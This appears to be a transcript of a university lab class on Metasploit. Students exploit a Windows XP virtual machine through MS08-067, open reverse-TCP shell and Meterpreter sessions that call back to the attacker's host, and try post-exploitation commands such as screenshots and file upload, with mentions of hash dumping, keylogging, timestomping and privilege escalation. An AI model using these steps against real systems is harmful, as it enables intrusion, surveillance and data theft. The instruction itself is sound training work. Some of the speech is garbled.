Okay, so we're going to get started here. Once again, on the T drive, there's a document called Metasploit Activity. It's a PDF. You can open it. It has the activity we're going to run through, basic requirements, then step-by-step instructions for what we're going to do. Does everybody see that on the T drive? Is that still there for everybody? Okay, good. So if you want it, it's there for the taking. Does everybody have Metasploit installed right now? No?
It's working.
Almost? Okay, great. This may take a few minutes, yeah. Okay. Is that where, is everybody kind of like right around this area? Okay, great. So it's almost done. So while that's going, everybody open up VirtualBox. You just type virtual in the Windows Word field thing here. And then it'll be there at some point. There we go. Alright. So what we're going to do is create a Windows XP virtual machine. We're using Windows XP because Windows XP is really vulnerable for exploits, and specifically the exploit that we're going to be using. That's why we did that. So click New. Give it a name. I'm going to call it Hacking Stuff. Thank you. Click Next, and then give it 512 megabytes of memory. Click Next, and we're going to do use an existing virtual hard drive. So we're not creating our own virtual hard drive. We have this already here for you. So use an existing virtual hard drive. Click the little folder button. Browse out to E, DFC, Windows XP, and then just click Windows 7.vmdk. The rest of those are going to follow in suit. It's going to pull it in, like kind of like MCase does the same thing for images. So open, and then do create. Is that good? Does everybody have that? Everybody? Yes? Okay. A couple of settings we have to mess with first before we get started. Click the settings button, and then click System, and then under Extended Features, you're going to click Enable I/O APIC. And then under the Processor tab, click Enable PAE NX. And then under Network, change this to Host Only. Make it a Host Only adapter. And then click OK. Does anybody have any idea as to why it's on that?
No, I'm saying under the adapter. Change.
Oh, right. Under Network, you can make under the Advanced thing and then Promiscuous mode, make this allow all. And then click OK. Is that okay with everyone? Does everybody have that? Okay, good. Does anybody have any idea as to why we changed this to a host-only network? Does anybody have any idea what that might mean? I know you know. Anybody? Brandon, I know you know too. You should know this. You helped me. Okay, well then, Linux guy?
Because exposing these to the internet would be a horrible idea.
Right.
This means that only the computer we are currently running can talk to it, and nothing else can.
That's correct. So we're making our own little mini network within this. That's why we have a virtual machine that'll have one IP that's completely separate from the subnet of the Bloomsburg network, and then we'll have another adapter on our local machine that will be able to talk to the virtual machine specifically off of the Bloomsburg network. So that way we're not causing any trouble there. one other thing we have to do is just for fun. If you go into the Windows prompt here and then type in cmd and then type in the command ipconfig, you'll see what that did. Our host-only network created the second adapter that has, so we now have this IP address 192.168.56.1 that we'll be using for our attacking. This will be our attacking machine's IP address. Quick question: does everybody have the subnet mask 255.255.255.0? No. Okay, so we'll have to change that. You right-click on the bottom right over here and then click Open Network and Sharing Center, and then change adapter settings, and then go to Local Area Connection 2. Right-click, Properties, and then under IP Protocol version 4. Click Properties again, and then right here in this subnet mask, type 255.255.255.0. Yeah. Yep. So once we're here at this area right here, local area connection 2, right click, Properties, Internet Protocol version 4, Properties, subnet mask, make it 255.255.255.0. Anybody have any problems with that? Everybody has that. Okay, click OK, close, then you can exit out of that, and just for fun, type in ipconfig one more time, and you should see what I see. Does everybody see what I see on that Ethernet adapter local area connection 2? Yes? Okay, great. Josh, you have any problems back there? Or? No? Everything's good? Okay, great. Okay. So back to Metasploit now. Is Metasploit done installing for everyone? Yes? Okay. So unclick the checkbox. We're not going to do Access Metasploit Web UI. Click Finish. And then once again over here in this Windows search, just type in Metasploit and then Metasploit console. And then it's going to take a few seconds to load. So while that's starting, we can also start our VM. So go back to Oracle's VirtualBox and just click Start. There's going to be a bunch of pop-ups. It's really annoying. Just click OK. So Dr. Matante. And then hopefully you'll all see Windows XP. Oh yay, I got a bunny. Wake up, Neo. That's awesome. See how cool Metasploit is?
Mine's a cow.
Yours is a cow? Yeah, some people will get cows. Some people get I love shells. That's pretty cool. Because that's like a pretty nice pun. Shells are funny. Very few words.
You got a cow? Oh.
What? Just bad.
It's funny how it's written. It was funny when Metasploit did it.
It wasn't.
Not so funny when anyone repeats it. It's the kind of thing you has to appear on your screen and then we all chuckle when it says that.
Okay. Fair enough. Okay. So just because... Oh. Are you okay, Dr. Montman? Oh, alright. So just because I'm ridiculously paranoid about everything when it comes to this stuff, and we want it to work, Within the virtual machine, within Windows, go to Start, Command Prompt, and then run ipconfig. Just everybody verify with me that everybody sees 192.168.56.101. Do we all see that? You don't see that? You don't? But you do see it? Okay. So something that's really awesome about Metasploit is that it's also like its own little shell, like command prompt. You can also run normal DOS commands. So we can run ping. So in Metasploit, type in the command ping, and then we're just going to ping 192.168.56.101. Make it bigger? Does it need it bigger? Okay. It looked a little small.
Oh, in here? I can hit this. Press start.
Yeah.
IP. You want to make sure that it matches what you have. 0% loss. 0 milliseconds. 0 milliseconds. Average of 0 milliseconds. And you want to put that.
Okay. Is that better?
Yeah.
Yeah, you can see that? Great. Okay.
Oh my goodness, that makes so much sense.
Like something like that. Okay. See how that looks. Oh. Whoa.
You're gonna have to make your XP one big.
You might want to not make it quite so big.
Yeah, so maybe not. Right click. Also, don't restart your computer if it's asking you to restart your computer. It's bad. Don't do that.
102.168.
Okay. So did the ping work for everybody? Yes? Oh, the Metasploit? Yeah. So there's... Yes? Yeah.
It says for mine, it says my request timed out.
Your request timed out. Can you try it again? Make sure she has her IP set. So if it times out, that means that when the packets don't reach the IP address that we sent it to, that means that the packets, somehow this computer is not able to talk to this computer, which is a bad thing, which means that we won't be able to hack it at all because we can't talk to it. So this ping is a good tester for determining whether or not we can actually talk to the computer, which we need to do in the first place. Okay. So if that worked, then everybody remember Nmap from last week? That was a lot of fun, right? So now we're going to do we'll just tie it in a little bit. Within Metasploit, we can run Nmap, which is really awesome also. So just run Nmap -S, capital V, -A, and then 192.168.56.10 So this is a aggressive scan, and it's also going to give us the versions of the port, of the programs that are running on the ports for this XP machine. So it's going to take a couple seconds. Does anybody have any questions so far?
That's never a good sign.
Or it's a really good sign.
So you gotta go with this not a good sign.
Yeah. So one thing I like to do when Nmap's running is press enter, just to see how much time it's taking. So mine seems to think it has 41 seconds to go. Is that about what everybody else has?
Mine's a little bit longer.
A little bit longer? Shouldn't be too much longer.
Oh.
What? You have longer?
41,
109?
Yeah.
Okay.
Mine keeps getting longer.
That's fine. So maybe what we'll do instead is just to see the open ports, Control C, interrupt it for the sake of time, and run mmap, and just do 192.168.56.101. Just run the basic nmap scan, just to see what ports are open. That's That's not good for me. Okay, does everybody see something that looks a lot like that? Good. Does anybody have port 445 open? A third port 445? That's good. That's the machine that we're going to. That's the port that we're going to be attacking with this exploit. So mine is not open right now, which is interesting.
Yeah.
Um,
Yeah, mine doesn't say it's open.
it doesn't say.
Mine is just like yours.
It's not? Okay, yeah, so sometimes, for some reason, it's I'm almost certain it's a VirtualBox problem. When we've encountered this problem, we've had to restart our virtual machine, which is not that long to do. If you don't see that port, it's probably not a bad idea to restart your virtual machine. So if you go back to it, VirtualBox, and then just run machine, close, power off, and then
Want to do clean shutdown?
it doesn't matter. Just power it off,
Sure, your virtual machine will run.
and then just restart it. It'll go right back up, and it boots up pretty quickly. So that's good.
Hey, that's open.
Yeah. So when you get it back up and running, run the nmap scan again. Just nmap 192.168.56.101, and
or
then
just push up arrow key and then hit enter.
Yeah.
There's the rest of this.
not everybody is advanced.
We've probably gotten used to doing that in the travel, but I don't consider
Okay, great. So mine says 445 is open. Does everybody else have that? Okay. So the next thing we're going to do is run the exploit. So type into Metasploit console, use exploit Windows SMB and then MS08 underscore 067, and once you're there, you can actually just push tab, and it'll auto-complete it for you. It should end in net API. Does everybody see that? Any problems? So what we did there is we typed in the command use exploit / Windows / SMB / MS08 underscore 067 underscore net API. Any problems? Okay, so then press enter. So now we're into this framework for this particular exploit. So one thing I like to do is look at information on this exploit. So you can just type in the command info, press enter, and it'll tell you basic options for it, which versions of XP it'll work for, the available targets, who made this exploit. There's also a nice description that tells you about the exploit. That's also really nice. And then there's even references that you could look up more about this particular exploit. So what we're going to end up doing here is filling in this setting, ElHost, which stands for remote host. So just type in set ElHost, make it 192.168.56.101. That ElHost is the host for the XP machine. That's the machine that we're exploiting. So press enter. So the next part of an exploit is the actual, how are we going to take control of this machine. So what we need next is a payload. That's called a payload. So we're going to set payload to Windows /shell /reverse TCP. And just so everybody knows, you can, to make this a lot shorter, you can click push the tab button. That makes it a lot faster. You don't actually have to type in everything. So if you type in WIN, you can push tab, and it'll fill in Windows. And then once you get SH, you can push tab, and it'll fill in shell. And reverse, you can type in refer, and you'll get the rest of it. So what this means, reverse TCP, is that our computer's going to send out like a little feeler towards the XP machine, and the XP machine is actually going to call out to us. This is what that means by reverse TCP. So this machine is actually going to connect back to us. We're not connecting to it. It's connecting to us. So push enter. And then one more thing we need for the payload is an ElHost. That's the listening host. Yeah. Yeah. How far? Where do you guys need it? What?
That a payload is not valid.
Okay. So for the payload. Okay. Just wait 1 second for everybody. Any questions from anybody else? Okay. Okay. So the last part of this is to set the ElHost. That's the listening host. That's our computer. So 192.168.56.1. Again, that's our listening host. We are the listener. So this needs an IP address. That way, when it calls out, it knows which IP address it's calling out to. So then you can just press enter. And just to verify that we have everything filled in right, we can do show options. And you'll see the payload options and the module options. So you have to make sure that whatever it says, whatever is required, we have. So we filled in our host, we filled in our ElHost. The L port and R port are automatically filled in, and same with the SMB pipe.
Just allow these.
And it's set for automatic targeting, which means that it'll automatically determine which operating system it is that it's targeting. So before we actually exploit this, I want to make sure. Is everything okay with? Is everybody else alright? We good? Okay. So the most amazing command there is in Metasploit, the exploit command. So just push exploit or press enter after typing in exploit. Okay, so this is real quick. Don't do anything. So this is really important. Make sure you have private networks and public networks checked there. Allow access, and just to run this quickly, just push the arrow key, the up arrow key, to get exploit back, and then press enter one more time. Now what we have is a shell. We have a Windows shell. Yay! Wow, that was really exciting, right?
I wasn't dropping a shell as exciting.
We just hacked our XP machine. So what we can do is we can. So what's one thing we might want to know? Maybe like who's logged into this computer, right? So there's a command called qwin stuff. Qwin stuff, I call it. I think everybody probably calls it that, but run that and then press enter, and you can see the username of this machine. Hack victim is the username, and so that's nice to know. Does everybody have that? See that? Any questions? You alright, Justin? Okay. Your exploit failed? Click show option, or type in show options in Metasploit. Make sure that your options all have exactly what I have. You guys are all good? You guys? Three? Good? Yours is failing too? Okay.
It's not going to pop up again. So try logging out. That's yeah, if you miss that, don't. You can. Okay. Sorry. Yeah. So if you miss that checkbox to check public and private networks, you did. Can you ping? Try pinging the IP addresses to make sure you still have connection for one. You help him with that? The guy next to you. Terrible. One thing I answered, you just told us to. first reaction is that it's like things to do once it goes to
Because we had already been setting the ElHost and ElHost for 148.
I'll figure out how to place it.
You can, if you have any questions, ask. Restart your virtual machine. Did ping work? Yeah. Ping worked. Yeah. I would say the same thing for you. Change your network adapter to bridge. Okay. One brief second, everyone.
You have to double check to make sure that you have that specific port.
Sorry.
And I guess after that, so that's why I got one. It was like, sorry, you can't, you have no idea what is going on.
Yeah.
That's very could be more just okay. So Alex. Yeah, that biggest line in America. Everybody lies. But I don't know anybody. They make it so uninteresting and boring. Plus, you normally when you download iTunes, you just want to get to your music right away, so you don't even worry about or anything.
Okay, so how is everybody on that? I know there's a couple of people who have some problems, but is everybody else for the majority okay?
Is this not open source?
What?
Metasploit.
Metasploit's open source, I believe.
Okay.
Pretty sure. Yeah, you can make your own. Yeah, you can actually develop your own exploits and actually load them into Metasploit and run them. Yeah. I have no idea how to code an exploit, so, but you can learn.
Probably don't know Ruby.
I don't. I know Python, but not Ruby.
I can do.
Okay, so moving on, we're gonna get out of this part. We're gonna do Control-C and abort this session. So we should all be back to this, the MSO8 Net API exploit. Is everybody back to that? You guys in the back, okay? Okay. You females, you guys are good? Sorry, I know not females, but women, girls, ladies, whatever you would like to be called, humans. Okay.
Your humans over there, okay? That's what I would say.
All right, so we're gonna do something. We're going to use the same exploit. We're just going to use a different payload. This payload's a lot cooler. It even has a cooler name. It's called Meterpreter. Whoa. Cool. Yeah. So set payload, Windows, Meterpreter, reverse TCP. So all we changed instead of using shell is use reverse TCP. After you do that, press enter. Does everybody have that? Okay. So if you do show options, you'll see what's really nice is that all of our options stay the same. We're all good. We already put in our ElHost. We already put in our ElHost. We don't have to do anything different. Now all you have to do is push exploit. Exploit. And now we have another prompt called Meterpreter. Does everybody see that? Meterpreter? Everybody? Anybody not seeing that? Better question? No. So you guys are neutrally seeing something. Good. Exploit failed?
It worked before, now it's failing. The connection was refused by the remote host, blah blah blah.
So one thing I would also recommend, Metasploit tends to work a lot better on Linux. For anybody who uses Linux, Metasploit, I've never had Metasploit crash this many times as it does on a Windows computer. So it does work a lot better on Linux. It's a native Linux program, but this is a Windows version. If it didn't work for you, is the error you're getting that it wasn't reachable, unreachable?
Yes.
Yeah?
Connection refused, the connection was refused, exploit failed, unreachable.
Can you try,
Restarting the virtual
restarting the virtual machine and even restarting Metasploit?
Restarting the virtual box.
Restarting the virtual box?
Because the port gets booked.
Oh, okay. Okay, so if it's failing for you, you may have to exit out of VirtualBox and then restart VirtualBox. It's a pain, but this is actually just like a kind of a normal-ish thing that we seem to be running into when we do the setup. It's the way it works for us, unfortunately.
It could be that Control C instead of typing X.
Do you think so? Control C worked for me though. Oh, you mean Control C is good versus exit?
I'm saying X works.
I ran Control C.
Or it could be just a machine.
Okay,
I don't know.
so where is everybody? I need an idea. Are we at Meterpreter? Who's at Meterpreter? Raise their hand. Great, 2 people are at Meterpreter. Fantastic. Okay. Who is restarting? You're at Meterpreter?
Yeah.
You're at Meterpreter?
You have to restart just the virtual.
Just restarting VirtualBox work or the virtual machine. Yeah. So restarting the virtual machine does
I now
tend to
have
fix this.
Meterpreter.
You do have Meterpreter?
Yes. I just restarted the virtual machine.
Jay Lee, how are you doing? What? No go? You 4? You're spectating. You guys quit? That's not fun. You two? How are you doing? Well, not good?
Just restarting Windows.
Justin and I know you're his roommate. Tyler. Justin and Tyler. Steve, you guys? You two? How are you doing? Good? Guys in the back? Good? Okay, great. So we're going to move on a little bit farther. So if you just type in help. So Interpreter is this console that you can do a lot of really, really cool things with. Starting from the bottom, actually, is some of the cooler stuff. So time stomp. So in forensics, one of the big things that we do look at is times, right? Dates and times. So with this program, if you're a hacker and you know that eventually somebody might be looking at your stuff and you would like to kind of cover your tracks a little bit, you can use this program, Time Stomp, completely mess with times. You can make this time anytime you want. I think the default if you do it, makes the time like January 1st, 1975 or something weird. It's just,
probably 1970.
yeah, something like that.
January 1st, 1970.
That's a-
the reset series.
Yeah, that's really cool.
Why not?
Hash dump is also really cool. So, if we had a password on this computer, on this XP machine, we could run hash dump. It would take the hashes from the SAM file, and then what we could do, we have those hashes from a SAM file. We could run password cracking tools like John the Ripper, and actually get the password out of it, which is really cool too. If the other computer has a webcam, we can take pictures. We can actually take a picture, like with their webcam, remotely, and see exactly what they're doing. It's actually really awesome, and I wish we could do that, but people frown upon that, and I don't know, it's weird.
And or connecting a webcam to a virtual machine
Yeah.
kind of a pain in the butt.
Exactly. So, and then another thing you can do is a keylogger. Does anybody know what a keylogger is? Great. Okay. Can you answer that?
Yeah,
What's your name?
Kevin.
Kevin. I won't remember your name, but what's your name? Kevin.
Kevin.
Okay. Go
His
ahead.
logger just monitors the users. So if they would type in their password, the hacker would be able to see what they typed in.
Great. Yeah, that's exactly it. That's a big thing. So it captures every single key that you touch. That's really awesome, right? Isn't that cool? Everybody thinks that's cool. Great. Okay. So,
Get system.
oh, screenshot. That's a really cool command. So we can see what's exactly on their screen. Run screenshot. Screenshot saved to Metasploit ZPLAEFYH. Great. So we know exactly where that is, right? Computer, local C, Metasploit, and then look for ZPL something or another. Bam! Mine has a wonderful Windows logo. That's cool, right? Does everybody else see something cool like that?
Mine's actually the desktop what I was looking at.
Now that's cool. A desktop. So, but the point is,
something had been going
if they're running a lot of things, you could actually take a screenshot of exactly what they're running. That's kind of creepy, right? But it's awesome. Don't do it though, unless you're a nice person.
That is to say that you should do this to your own computer.
Yes.
Find out whether or not your computer is vulnerable. And then you can be creeped out because other people could do it to you, and you should fix that vulnerability.
Another thing we can do is run PS. It just lists the running processes on this computer. So we could see exactly what they were running. We haven't really done anything on our virtual machine, so it's not running anything that it shouldn't be running. Normal Windows processes.
Will Git system work?
I think there is a Git. There's a Git. There is a Git system or something. Or system.
It's in Elevate.
Yeah. You could also kill processes, which is pretty cool too. Also, you could also start a shell,
Oops.
which is what we did before. So if you just type in shell, we're back to a normal Windows shell. This is like the shell of their computer. We don't need to mess with anything in that, but you could do it.
If we do print commands into the shell, will they see the output?
I don't think so. I'm not sure. Try it.
I guess we can.
Okay, so another thing that we could do that's really cool, we can actually upload files, any kind of file, to their computer. That's kind of cool. So imagine if you had another type of virus or something that you had packaged into a picture or something. You could actually upload that to their computer. So let's do something like that actually. So open up my computer, go to the local C drive. This is just for convenience when we're writing our path. Just make a text file, call it really, really bad stuff. Anybody who's at Dr. Riley will get that reference. Haha. So then you can just type something in it like, this is really bad stuff. Whoa. Really bad stuff. Okay. Save it. Exit out of it. And then go back to Metasploit console. So we're gonna upload that file straight to our virtual machine. So upload is the command. Upload C:/ really bad file. Actually, for convenience, one more time, go back and make your file name all one word, because otherwise you have to start putting quotations in it and it gets kind of messy. So just make it one word, really bad stuff. .txt. Okay, so we're gonna upload that, and we're gonna put this. Let's make this on the desktop just for fun, so you can see this actually happen. So if you have your XP virtual machine, try to put it somewhere where you can see it, so you can actually see this appear on your desktop. So this one we actually do have to have quotations in. So you'll have quotations C:/ documents and settings / hack victim. How do we know that that's hacked victim? How do we know what? Yeah, we ran qwinsta, and that told us. So hack victim, and then desktop. And then closing quotations. And then press enter. Running didn't work. Okay.
Unload command, upload.
Andy.
Yeah.
Try 2 slashes.
On my on the
Really bad stuff.
yeah, okay. So the 2/ thing is weird. For some reason Metasploit requires that you have that. Sometimes it does, sometimes it doesn't. I'm not sure what happened there. Really bad stuff. Okay, so that worked. So you may need to have double slashes on your on the location of really bad stuff. So
when it displays it only displays it as well.
yeah, right, which is weird. So if you go back to hack me, whoa, how did that get there? I know, we just uploaded it. That's cool, right? So you can open it. There it is. This is really bad stuff.
Just appeared.
Huh?
It appeared on my desktop.
Oh, yeah. And so with that, if we can upload, we can also download. We could download files from that computer to our computer. So if we wanted to steal their data, we could steal their data. If we wanted to delete data from their computer, we could do it. If we just wanted to wreak havoc and start deleting random system files and just make their system go crazy, we could do that. That's something that's possible using a interpreter.
I tried the escalation to system,
Mm-hmm.
and it worked.
Okay, yeah.
So git system will do that. At which point you're running at system level.
Yeah.
So you could do a lot more stuff than if they have antivirus.
Right, that's
also,
true.
I think we could possibly just tell it to start erasing the disk.
Yeah.
I think
that's
I would
true
love
as
to
well.
try that.
Go ahead.
Yeah.
So that's the cool thing about a virtual machine. You can do whatever the heck you want with it, and it's okay because it's a virtual machine. You could make a new one. So when you're working with stuff like this, work with virtual machines. That way you can do whatever you want without really hurting anything. I feel obligated to say don't do bad things with this. You could do bad things with this, but please don't, because that would look really bad for me because I'm teaching you guys bad things. So don't do that. That'd be awesome. But this is really cool stuff, I think. I hope you guys enjoyed it. The last thing you can do just to get out of this is just exit. That's all you have to do. And then you can just exit right out of Metasploit Pro Console. Bam. Exit out of everything. You don't need it. exit out of the virtual machine. That's the end. Feel free to take any of the stuff that you want. You can take the virtual machine, the XP virtual machine, take Metasploit, take the PDF if you want to. Yeah. Good? Did everybody like that? Is that cool? Cool? Good. 2 people like that. Awesome. All right, so Brandon's going to talk to you for 1 second and a half. Right?
Well, if you're not interested in the cyber defense stuff, like the competition, then you guys can leave. Otherwise, you'd say a minute or 2 would be great.
Steve, should we have? Do you want this running? Do you want this streaming?
No, you can turn it off.
Do you want to turn this off, Steve? Okay.
Yeah,